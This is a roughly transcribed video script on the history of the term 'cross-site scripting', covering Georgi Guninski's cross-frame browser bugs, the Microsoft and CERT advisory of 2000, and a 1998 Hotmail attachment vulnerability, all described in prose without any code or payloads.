The Origin of Cross-Site Scripting (XSS) - Hacker Etymology

Cross-site Scripting is the name for a well-known type of security issue that can affect websites.
and I Always thought the name Xss is terrible
I think it's confusing a lot of beginners Well
At least it confused me back when I started instead.
I think JavaScript Code injection or more General HTML injection makes a lot more sense.
So I Always wondered why do we have this weird name Cross-site Scripting
At some point, somebody had to invent this name and somebody had to discover the type of vulnerability in the first place. Another motivation for this video is that of course, having names for things like Xss it is very important when we communicate with each other, but naming things can also cause compartmentalization. Mind cuffs, blinds, and hacking in its Essence is extremely creative and you should always think outside the box. So in my opinion, it's important to understand the history of any kind of vulnerability because it.

When you want to know something about history, you always go check what Wikipedia says and on the cross-site scripting page we can read: Microsoft Security Engineers Introduced the term cross-site scripting in January 2000, but the source listed for that is a Microsoft blog post from 2009 celebrating the 10 years of process scripting.

 

While this is not the original release in this blog post, David Ross shares some of the names that were suggested: unauthorized Site Scripting URL Parameter script Insertion or cross-site Scripting Cool, but it doesn't help much.
I Still don't understand why they thought of these names.
Why not HTML or JavaScript injection or insertion?
though the URL parameter script insertion is pretty close.
Besides those name ideas, David Also mentioned that they coordinated an advisory release with CERT in the year 2000.

 

So Microsoft worked together on this with the national computer Emergency Response Team
what was this emergency
Also, why was Microsoft the one to talk about it
I Want to better understand what happened in 1999 and 2000 and luckily I was able to talk to David Ross the author of this article.
so I was wondering back in 99 2000 how novel was this kind of attack?
Were Xss issues already known or was it something the team and Microsoft discovered
and he responded saying I was doing work related to Georgi Guninski's bugs, which we termed "cross-domain" bugs.

 

 

recognize this name If you have seen the previous videos on this topic, you will know Georgi

Yeah, initially my plan was to just make a single video about the origin of the name Xss
but when I started researching deeper thanks to David Ross I realized history is a lot richer
and to understand how we got to the term cross-site scripting, we had to understand the events that happened before it.

 

 

So if you haven't seen the previous videos, go check them out.
The playlist is linked below, but to Briefly Summarize:
Browsers had a lot of interesting security bugs at the time related to JavaScript and we have looked at several of these original vulnerabilities in action.
One of them was for example, this issue Georgi found in Internet Explorer and it was disclosed in January 2000 just nine days before the world would get to introduce to cross-site scripting.
Now this particular browser issue was referred to as cross frame policy security issue and that name makes total sense.
These vulnerabilities Back then, we're always breaking the browser security boundary between two websites.

Of course, these vulnerabilities all work differently,
but in the end, it's always one website that either embeds another side via iframes or opens another site via window open
and somehow exploiting a bug in the browser can access data from the other website like the cookies or so.
So we have an issue related to crossing over into another browser frame Cross Frame Policy Security issue.

but these were browser issues.
Xss is a vulnerability in websites themselves, and as we now know in parallel to these kind of browser security research from Gyogi and others, a new field of exploitation was slowly boiling up.
And of course, Microsoft didn't invent cross-site scripting attacks themselves.
It was already getting exploited in practice.
So have a look at this vulnerability disclosure from August 1998.

 

 

 

So have a look at this vulnerability disclosure from August 1998.
Hot Male attackments. They have a logo. To all these people complaining about vulnerability names, logos, and websites 1998, There you have it. It is not a new trend, it always happened. And I'm glad that this website exists because it's really hard to find information about the original excess assetex. But thanks to a website like this, a lot of history is preserved. So let's read a few paragraphs of this. This page describes a security problem that Blue Adept discovered with Microsoft's Hotmail service on August 28, 1998.. As you probably know, Hotmail is Microsoft Webmail service.

So email in the browser users clicking on mail attachments in Hotmail are vulnerable to having their passwords stolen by malicious users. Further down, they explain how you can send a Hotmail attachment yourself. They have here this mailmes.html document which you can send yourself as an attachment and when opening it in Hotmail a payload triggers. Now the payload in this example is actually at Macromedia Shockwave plugin. But look at this comparison site which free mail services are safe. So Microsoft Hotmail is vulnerable to Java applets and a few other services as well. But look there. They also list which services are vulnerable to injecting script tags, hidden script tags, and meta text. I'm not 100 sure what the difference here is, but clearly this is a classic case of cross-site scripting.